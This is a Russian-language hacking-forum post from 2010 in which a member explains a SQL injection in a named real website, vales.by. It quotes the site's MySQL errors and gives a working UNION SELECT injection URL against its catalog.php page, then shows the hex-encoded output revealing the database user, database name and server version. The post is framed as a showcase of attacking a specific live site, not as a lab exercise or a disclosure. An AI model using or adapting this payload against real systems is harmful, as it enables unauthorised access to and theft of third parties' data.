24.03.2010, 23:12
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
Код:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет. Улыбнуло 
Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа.
Делаем запрос:
Код:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),database(),version()))
Получаем:
Код:
76616C65736279406C6F63616C686F73743A76616C657362793A352E302E3930
Что в HEX:
Код:
valesby@localhost:valesby:5.0.90
Тоесть
Проявляем смекалку и нестандартное мышление, товарищи... 
Последний раз редактировалось mailbrush; 24.03.2010 в 23:15..
|
|
|